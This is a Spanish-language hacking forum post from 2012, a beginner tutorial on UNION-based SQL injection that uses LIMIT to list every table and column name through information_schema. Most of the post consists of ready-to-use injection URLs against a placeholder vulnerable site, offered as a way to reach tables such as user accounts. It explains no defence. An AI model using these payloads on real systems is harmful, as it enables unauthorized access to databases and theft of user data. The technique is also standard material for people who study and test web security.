comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Sql Injection (Usando Limit) n00b Friendly

  • 0 Respuestas
  • 1567 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Dedalo

  • *
  • Underc0der
  • Mensajes: 117
  • Actividad:
    0%
  • Reputación 0
  • KUSH
    • Ver Perfil
    • Twitter Personal
  • Twitter: https://twitter.com/SeguridadBlanca
« en: Mayo 06, 2012, 04:23:35 pm »
Bueno esto no es un tutorial muy extenso sino que hay veces que tengo amigos que me dicen oe tienes alguna tool por que no se los nombres de las tablas y yo... chequea con el schema y me dice como no entiendo y yo saca los nombres de las tablas asi usando el limit y no saben como porque es verdad en la mayoría de tutoriales ponen:

-99+Union+Select+01,2,3,4,5+From+Nombre_tabla-- y ese nombre lo deben de adivinar.... y si dicen from information_schema.tables ponen en el 2 table_name y no explican mucho más... bueno compas funciona asi:


http://webvulnerable.com/noticia.php?id=-99+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12+FROM+information_schema.tables--


luego en la web aparecerán marcados algunos numeros pueden ser 2 o 3 bueno ese numero lo reemplazamos en la url... por table_name y en donde aparecia ese numerito ahora aparecerá un nombre medio raro eso es del sistema bueno luego para ver las demás... aquí es donde usamos el limit...



http://webvulnerable.com/noticia.php?id=-99+UNION+SELECT+0,1,2,3,table_name,5,6,7,8,9,10,11,12+FROM+information_schema.tables+LIMIT+1,1--

listo chamaquitos.... ahora es facilito seguir sacando el nombre de las tablas... cambian el primer 1 por 2 luego por 3 luego por 4 y asi sucesivamente...

http://webvulnerable.com/noticia.php?id=-99+UNION+SELECT+0,1,2,3,table_name,5,6,7,8,9,10,11,12+FROM+information_schema.tables+LIMIT+2,1--
http://webvulnerable.com/noticia.php?id=-99+UNION+SELECT+0,1,2,3,table_name,5,6,7,8,9,10,11,12+FROM+information_schema.tables+LIMIT+3,1--


y asi consecutivamente y listo ya tenemos todos los nombres de las tablas capaz en la 15 esté usuarios o web_01_usuarios xD un nombre que no adivinariamos y bueno ahora con las columnas no?



http://webvulnerable.com/noticia.php?id=-99+UNION+SELECT+0,1,2,3,column_name,5,6,7,8,9,10,11,12+FROM+information_schema.columns+WHERE+table_name=0xnombredelatablaenhexa+LIMIT+1,1--


asi y vas subiendo el limit tambien para sacar todos los nombres :D



http://webvulnerable.com/noticia.php?id=-99+UNION+SELECT+0,1,2,3,column_name,5,6,7,8,9,10,11,12+FROM+information_schema.columns+WHERE+table_name=0xnombredelatablaenhexa+LIMIT+2,1--

http://webvulnerable.com/noticia.php?id=-99+UNION+SELECT+0,1,2,3,column_name,5,6,7,8,9,10,11,12+FROM+information_schema.columns+WHERE+table_name=0xnombredelatablaenhexa+LIMIT+3,1--



y así sucesivamente, en algunos servidores no protegidos varía y no necesitan poner el nombre de la tabla en hex sino 'nombre'.


bueno se que muchos aquí ya sabian esto pero algunos no asi que espero les haya servido.


Saludos,
Dedalo


PD: Recuerden que aquí lo que quiero es enseñar lo simple del limit para sacar las tablas y columnas nada mas.

 

¿Te gustó el post? COMPARTILO!



vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection

Iniciado por morodog

Respuestas: 1
Vistas: 1917
Último mensaje Junio 09, 2013, 12:05:31 pm
por ANTRAX
SQL Injection - Joomla módulo "com_fireboard"

Iniciado por M5f3r0

Respuestas: 0
Vistas: 1818
Último mensaje Agosto 16, 2013, 01:43:18 am
por M5f3r0
[Curso] SQL Injection desde 0 - Union based y Blind Boolean Based.

Iniciado por M5f3r0

Respuestas: 8
Vistas: 9159
Último mensaje Abril 21, 2017, 04:36:34 am
por M5f3r0
Mysql injection avanzada: "doble query/error based"

Iniciado por q3rv0

Respuestas: 2
Vistas: 2599
Último mensaje Agosto 30, 2012, 04:26:01 am
por andrewtwo
Tecnicas de Blind Mysql Injection (Bit Shifting && Find_in_set())

Iniciado por q3rv0

Respuestas: 3
Vistas: 2329
Último mensaje Agosto 30, 2012, 12:50:52 am
por andrewtwo